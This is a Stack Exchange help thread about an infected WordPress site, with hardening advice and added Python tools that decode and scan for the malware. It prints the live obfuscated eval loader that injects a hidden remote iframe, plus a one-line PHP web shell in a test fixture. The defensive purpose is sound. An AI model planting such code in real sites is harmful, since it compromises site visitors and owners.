
security - Wordpress Malware Problem help!

This question already exists: Closed 13 years ago.

Possible Duplicate:
Wordpress Trojan issue help!

I accessed the WordPress website I am building and received a warning about a trojan from my anti-virus software. I have now checked the site with various online scanners and it appears that someone has planted an inline frame containing the code posted below...

I didn't even know WordPress could get infected in this way. Please help me out!

Here is a screenshot of the antivirus warning.

https://i.sstatic/NaSE6.png

and here is some of the malicious script code planted on my site.

    if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);if(window['d'+'o'+'c'+'u'+'m'+'ent'])aa=/\w/.exec(new Date()).index+[];aaa='0';try{if(/123/.exec("a").index!=5);}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!70!7!80!65!66!60!65!64!72!69!63!80!62!61!64!62!76!7!60!72!70!8!77!8!9!58!11!61!12!10!59!62!13!17!15!59!18!12!58!58!12!9!61!18!59!62!10!9!15!11!9!18!59!13!59!18!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'mChar';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);

and inside the index.php:

    1583b0# echo(gzinflate(base64_decode("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")));
    /1583b0

How can I remove this and recover the site?


asked Feb 22, 2012 at 23:08 by LatinUnit; edited Apr 13, 2017 at 12:37 by CommunityBot
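Added example (not code from the question or the answer): a Python reimplementation of the loader's decoding step, so the payload can be read offline instead of being handed to a browser. The loader quoted above splits the long string on `!`, adds 39 to every number, turns each into a character with `String.fromCharCode`, and passes the result to `eval` (reached as `window['e'+'val']` so the word never appears literally). The decoding is gated on `/\w/.exec(new Date()).index` and on the exception thrown by `/123/.exec("a").index`, behaviour that a naive JavaScript emulator gets wrong, which is how the loader stays inert in simple scanners. Decoded, the page's payload defines an `iframer()` function that appends a 10x10 `visibility:hidden; position:absolute` iframe to the document body, pointing at a remote URL. `PAYLOAD_PREFIX` below is the first 64 tokens copied from the question; `SAMPLE_JS`, `encode`, `guess_offset` and `iframe_sources` are constructed for this example.

```python
"""Offline decoder for the number-list JavaScript loader quoted in the question."""
import re
import string

# First 64 tokens of the payload string copied from the question above.
PAYLOAD_PREFIX = (
    "-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!"
    "77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!"
    "-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86"
)

OFFSET = 39  # the loader's r(39+1*w[j]) is String.fromCharCode(39 + token)


def decode(payload: str, offset: int = OFFSET, sep: str = "!") -> str:
    """Mirror of the loader's loop: split on sep, add the offset, fromCharCode."""
    return "".join(chr(offset + int(tok)) for tok in payload.split(sep))


def encode(text: str, offset: int = OFFSET, sep: str = "!") -> str:
    """Inverse of decode (constructed helper): how the number list was produced."""
    return sep.join(str(ord(ch) - offset) for ch in text)


def guess_offset(payload: str, sep: str = "!"):
    """Variants of this loader change the additive constant. Try every offset
    that keeps the output inside ASCII and return the first one whose output
    is entirely printable and mentions 'document'; None if no offset fits."""
    tokens = [int(tok) for tok in payload.split(sep)]
    lo, hi = min(tokens), max(tokens)
    for offset in range(-lo, 0x7F - hi + 1):
        text = "".join(chr(offset + t) for t in tokens)
        if "document" in text and all(c in string.printable for c in text):
            return offset
    return None


IFRAME_SRC = re.compile(r"""<iframe[^>]*\bsrc=['"]([^'"]+)['"]""", re.I)


def iframe_sources(js: str):
    """Pull iframe targets out of decoded JavaScript so they can be blocked or reported."""
    return IFRAME_SRC.findall(js)


# Constructed sample (not the page's payload) showing the document.write branch.
SAMPLE_JS = (
    "document.write(\"<iframe src='http://example.invalid/t/constructed' "
    "width='10' height='10' style='visibility:hidden'></iframe>\");"
)

if __name__ == "__main__":
    print(repr(decode(PAYLOAD_PREFIX)))          # the if(...){iframer();} prologue
    print("offset used by the loader:", guess_offset(PAYLOAD_PREFIX))
    print("iframe targets in sample:", iframe_sources(decode(encode(SAMPLE_JS))))
```

Run it against the full string from the question (everything between `f='` and `'.split('!')`) to recover the whole script; the iframe URL it prints is the indicator to block at the proxy and to search the rest of the site for.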
  • 1 make sure you remove the code from your index.php, and look at your access log to see how they got in there – Bainternet Commented Feb 23, 2012 at 1:21
  • "migrated from webmasters.stackexchange 13 hours ago. This question came from our site for pro webmasters." - so, given that hacked-site questions are explicitly out of scope in our FAQ, once again, a sister SE site migrates an out-of-scope question to WPSE. When will this stop? – Chip Bennett Commented Feb 23, 2012 at 14:33
  • @ChipBennett it is a wordpress centric question and I guess the expectation was that the wordpress stack would have some helpful advice for the OP - even if the question is specifically out of scope I would have thought someone would have put together a cleanup wiki entry - if only because people come here looking for help. This kind of thinking is why I use StackOverflow for WP questions and not the actual Wordpress site. – toomanyairmiles Commented Feb 23, 2012 at 15:11
  • "even if the question is specifically out of scope..." - so, is it normal practice for SE sites to send questions to other SE sites, when the questions are knowingly out of scope? If so, then what is the point of even having a scope? – Chip Bennett Commented Feb 23, 2012 at 15:25
  • @ChipBennett there are a number of things or question types that are effectively out of scope but frequently asked, and that's why the COMMUNITY WIKI exists, to HELP people. Jeez! – toomanyairmiles Commented Feb 23, 2012 at 16:27

1 Answer (score 4)

Basic Security Steps

Since WordPress is so popular there are a lot of drive-by hacks knocking around taking advantage of flaws in basic security. All WordPress users should take the following basic and easy steps to protect themselves:

  • Do not use wp_ as the database table prefix, use any string of random characters that appeals.
  • Turn off Wordpress DB errors.
  • Make sure your directories are set to chmod 755 and files 644.
  • Use a secure password generator (use at least 15 characters).
  • Do not use admin as a username.
  • Place a blank .htaccess file in the wp-admin directory.
  • Read Wordpress hardening
  • Check the Google Cache of your site for hidden malware, some cunning malware only displays its payload to the google bot.
  • Remove <meta name="generator" content="WordPress X.X.X" /> from your site's header by placing remove_action('wp_head', 'wp_generator'); in your functions.php file (drive by attackers will not have an easy way to find which version they are targeting if you do this).

TimThumb Hack

There is also a very popular drive-by hack associated with an old version of the popular TimThumb script, which causes a lot of problems for webmasters. Check your uploads directory for PHP files and ensure you've upgraded to the latest version of the script to avoid this.

Advice

I run about 10 different Wordpresses and have found the WP-Security plugin and account from website defender invaluable, it scans your site regularly and reports on security errors, malware, and even page errors via email so you can be assured that you know when something goes wrong.

WP-Firewall is also very useful for defense against 0-Day exploits and VirusTotal is handy if you suspect an infection.

Akismet and Disqus are useful tools for defending against comment spam, and you should read the webmaster pros community wiki on this subject.

Webmaster Tools

You should also sign up to Google Webmaster Tools, but if you suspect an infection, take all steps to find and clean it up first or you may end up with Google warning your users that yours is a reported attack site.

If it detects an infection Google will send an email to all of the following addresses abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@ so you should ensure that you have at least one of these in place and monitored.

Paid Removal Services / Where To Get Help

There are also a number of sites which offer paid malware removal services. I would be very suspicious of these; many appear to be scams of one sort or another.

There is plenty of high-quality help and support available for free in the WordPress forums, on Webmaster Pros, the WordPress Stack Exchange site and on Stack Overflow. Don't pay for things you can fix on your own.
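The first comment on the question and the answer's TimThumb section both come down to a file-system sweep: find the injected `echo(gzinflate(base64_decode(...)))` in index.php, find PHP that has no business under wp-content/uploads, and confirm that directories are 755 and files 644. The Python script below is an added example, not part of the answer. It builds a constructed WordPress-like tree (the injected line with a harmless constructed payload, a PHP drop in uploads, a world-writable wp-config.php and one clean theme file) and reports what a practitioner would look at; `php_gzinflate` reverses the PHP call from the question (PHP's gzinflate is raw DEFLATE, hence zlib with `wbits=-15`), and `php_gzdeflate_b64` exists only to build the fixture. A scan like this finds symptoms; recovery still means locating the entry point in the access logs, as the first comment says, rotating every credential, and replacing core, plugins and themes from known-good copies rather than trusting cleaned files.

```python
"""Triage sweep of a WordPress tree for the findings discussed on this page."""
import base64
import os
import re
import tempfile
import zlib
from pathlib import Path

# Functions injected PHP is usually wrapped in; a hit is a lead, not proof.
SUSPICIOUS = re.compile(
    r"\b(eval|gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I)
# The exact shape found in the question's index.php.
GZ_B64 = re.compile(
    r"gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")


def php_gzinflate(b64: str) -> str:
    """Reverse PHP's gzinflate(base64_decode(...)): raw DEFLATE, no zlib header."""
    return zlib.decompress(base64.b64decode(b64), -15).decode("utf-8", "replace")


def php_gzdeflate_b64(text: str) -> str:
    """Inverse of php_gzinflate; only used to construct the fixture."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode()


def scan(root: Path):
    """Return (kind, relative path, detail) triples for everything worth a look."""
    findings = []
    for path in sorted(root.rglob("*")):
        rel = path.relative_to(root).as_posix()
        mode = path.stat().st_mode & 0o777
        want = 0o755 if path.is_dir() else 0o644
        if mode & ~want:                      # any bit beyond 755 / 644
            findings.append(("loose permissions", rel, oct(mode)))
        if path.is_dir():
            continue
        if rel.startswith("wp-content/uploads/") and path.suffix.lower() in (".php", ".phtml", ".php5"):
            findings.append(("php in uploads", rel, ""))
        text = path.read_text(errors="replace")
        for m in GZ_B64.finditer(text):       # show what the blob hides
            findings.append(("gzinflate payload", rel, php_gzinflate(m.group(1))[:60]))
        names = sorted({m.group(1).lower() for m in SUSPICIOUS.finditer(text)})
        if names:
            findings.append(("suspicious call", rel, ",".join(names)))
    return findings


def build_fixture() -> Path:
    """Constructed tree: injected index.php, PHP drop in uploads,
    world-writable wp-config.php, clean functions.php."""
    root = Path(tempfile.mkdtemp())
    hidden = ('<iframe src="http://example.invalid/t/constructed" width="10" '
              'height="10" style="visibility:hidden"></iframe>')
    files = {
        "index.php": ('<?php\n/*1583b0*/ echo(gzinflate(base64_decode("%s"))); /*1583b0*/\n'
                      "define('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"
                      % php_gzdeflate_b64(hidden)),
        "wp-config.php": "<?php\n$table_prefix = 'wp_';\n",
        "wp-content/themes/site/functions.php": "<?php\nremove_action('wp_head', 'wp_generator');\n",
        "wp-content/uploads/2012/02/thumb.php": '<?php @eval(base64_decode($_POST["p"])); ?>\n',
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)
    for p in root.rglob("*"):
        os.chmod(p, 0o755 if p.is_dir() else 0o644)
    os.chmod(root / "wp-config.php", 0o666)   # the one deliberate permission slip
    return root


if __name__ == "__main__":
    for kind, rel, detail in scan(build_fixture()):
        print(f"{kind:18} {rel:42} {detail}")
```

Point `scan` at a real document root and read every hit; legitimate plugins do call base64_decode, so the "suspicious call" lines are where to start reading, while "php in uploads" and a decoded gzinflate blob that turns out to be markup or JavaScript are findings in their own right.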
